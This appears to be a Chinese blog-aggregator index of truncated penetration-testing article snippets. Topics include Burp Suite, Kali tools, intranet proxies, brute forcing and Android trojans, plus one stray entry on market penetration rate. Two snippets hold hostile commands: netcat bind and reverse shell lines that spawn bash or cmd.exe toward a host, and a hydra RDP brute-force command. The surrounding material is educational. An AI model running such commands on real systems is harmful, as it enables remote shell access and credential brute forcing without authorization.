• 【渗透测试小白系列】之简单使用BurpSuite进行拦包及请求包、响应包的格式和含义 - Woori

    时间:2024-03-12 14:20:49

    【渗透测试小白系列】之简单使用BurpSuite进行拦包及请求包、响应包的格式和含义 (本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦) 一、HTTP协议基础HTTP:HyperText Transfer Protocol,超文本传输协议1.协议特...

  • 常见渗透测试靶场系统

    时间:2024-03-11 22:01:09

    注入工具推荐SQLMAP:https://github.com/sqlmapproject/sqlmapHavij破解版:Havij-1.15-pro一、VulHu...

  • 详解Linux开源安全审计和渗透测试工具Lynis

    时间:2024-03-11 21:34:41

     转载自FreeBuf.COMLynis是一款Unix系统的安全审计以及加固工具,能够进行深层次的安全扫描,其目的是检测潜在的时间并对未来的系统加固提供建...

  • [Kali_BT]一次不太完美的通过蓝牙强制链接并渗透智能手机的过程

    时间:2024-03-11 17:57:22

        环境:攻击主机和目标手机在同一局域网下;目标手机开启了蓝牙,但是设置了隐藏简单原理:得知目标手机开启了蓝牙,通过bl...

  • 渗透利器-kali工具 (第二章-5) 信息收集之CMS指纹识别-CMSeek

    时间:2024-03-11 16:04:42

    本文内容:指纹识别知多少WAFCDN 从信息收集到网站架构防护信息收集1.指纹识别知多少:1.CMS[内容管理系统]:快速搭建网站的模板。2.Web应用框...

  • web渗透--ftp暴力破解,明文、嗅探安全等

    时间:2024-03-10 10:07:12

    一、 FTP用户名密码暴力破解     1、知道用户名和密码nc直接相连  ...

  • [内网渗透]端口转发工具大合集

    时间:2024-03-09 20:23:14

    0x00 简介本文主要介绍一下端口转发工具。其中大部分内容均是从各位师傅那里转载过来的,最后会有标注相应的原文地址。文中工具下载地址:https://github....

  • 渗透测试--使用kali入侵局域网手机实验

    时间:2024-03-09 17:30:16

    声明:本文仅限于技术讨论与学习,严禁用于非法途径,否则后果自负。原理:借助kali的Metasploit渗透测试框架生成远程木马,然后感染局域网内Android手机...

  • Kali渗透测试——UPNP网关发现工具Miranda - Genesis

    时间:2024-03-09 17:29:52

    Kali渗透测试——UPNP网关发现工具Miranda UPNP网关发现工具MirandaMirandaUPNP 是各种各样的智能设备、无线设备和个人电脑等实现遍布全球的对等网络连接(P2P)的结构。例如,迅雷软件就支持UPNP结构,从而加快软件下载速度...

  • Kali Linux 下渗透测试 | 3389 批量爆破神器 | hydra | 内网渗透测试

    时间:2024-03-09 17:29:28

    kali linux 下渗透测试,3389 批量爆破神器hydra -M target.txt rdp -L userlist.txt -P passwordlis...

  • 内网渗透的边界场景分析+内网代理整理

    时间:2024-03-08 12:05:27

     先从nc开始理解正向代理和反向代理:1、正向连接受害者主机执行nc -e -t /bin/bash -lvp 7777攻击者执行nc -t 192.168.16.X 77772、反向连接受害者主机执行nc -t -e cmd.exe 192.168.16.104 7777攻击者主机执行n...

  • 内网渗透之socks5代理(reGeorg+proxifier详细配置说明)

    时间:2024-03-08 12:04:09

    1. 首先我们需要明白正向代理和反向代理的区别1.1 正向代理(Forward Proxy)PythonLhost-->proxy-->RhostLho...

  • 内网渗透——代理总结

    时间:2024-03-08 12:03:22

    内网各种代理的使用 1.早期ew,全名EarthWorm,不过被杀烂了:https://github.com/idlefire/ew2.frp3.reg,...

  • 市场渗透率、用户留存率、ARPPU、APA

    时间:2024-03-07 18:57:20

    市场渗透率对于有形的商品,指的是在被调查的对象(总样本)中,一个品牌(或者品类、或者子品牌)的产品,使用(拥有)者的比例。也可以直接理解为用户渗透率或者消费者占有率,是一个品牌在市场中位置的总和,它是多年形成的结果。与市场占有率的区别市场占有率是有时间和单位限制的,也就是在某一时间段:年、季度、月度...

  • 2024护网面试题精选(一)-0x01.渗透思路篇

    时间:2024-03-07 07:52:44

    00-拿到目标站以后的渗透思路? 渗透测试流程:1. 项目前期准备工作2. 信息收集:whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、 数据库类型、二级域名、防火墙、维护者信息3. 漏洞扫描:Nessus, AWVS4. 手动挖掘:逻辑漏洞5. 验证漏洞6. 修复建议7...

  • Web攻防之二实施渗透测试(黑客如何拿网站权限)

    时间:2024-03-06 21:34:41

    通过上次的内容,我们知道可以通过注入得到需要的数据,比如后台管理员的账号、密码等,但是得到了账号密码后,我们要如何行动呢?首先要制定一个渗透流程:1、探测信息2、利用漏洞得到管理账号密码3、找到后台4、登录后台取得web权限探测信息在实施第一步骤的时候,我们要得到一些基本信息:1、server服务器...

  • Sliver C2通关渗透攻击红队内网域靶场2.0

    时间:2024-03-06 18:23:47

    准备2012 server第一台机器开机后,要在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain​手动运行下 startWebLogic.cmd​,但是我访问7001遇到了报错:​​是路径配置错误,但是没搜到什么解决...

  • 学习笔记:《Kali Linux 2 网络渗透测试 实践指南 第2版》之kali Linux使用基础

    时间:2024-03-05 17:41:57

    本章重点内容:1、Kali Linux中的文件系统2、Kali Linux 常用命令2.1 与文件目录相关的命令(pwd、cd、ls)...

  • 渗透之路 环境搭建【第一篇】php攻防环境搭建

    时间:2024-03-05 08:05:44

    安装win2003虚拟机安装好win2003,安装好vmtools(物理机就能和win2003相互拖拽文件了)查看ip安装工具phpstudy安装和使用下载&nbs...

  • Web前端渗透测试技术小结(一)

    时间:2024-03-05 07:58:42

    首先端正一下态度不可干违法的事 1、SQL注入测试    对于存在SQL注入的网页,使用SQL语句进行关联查询(仿照C/S模式)eg ...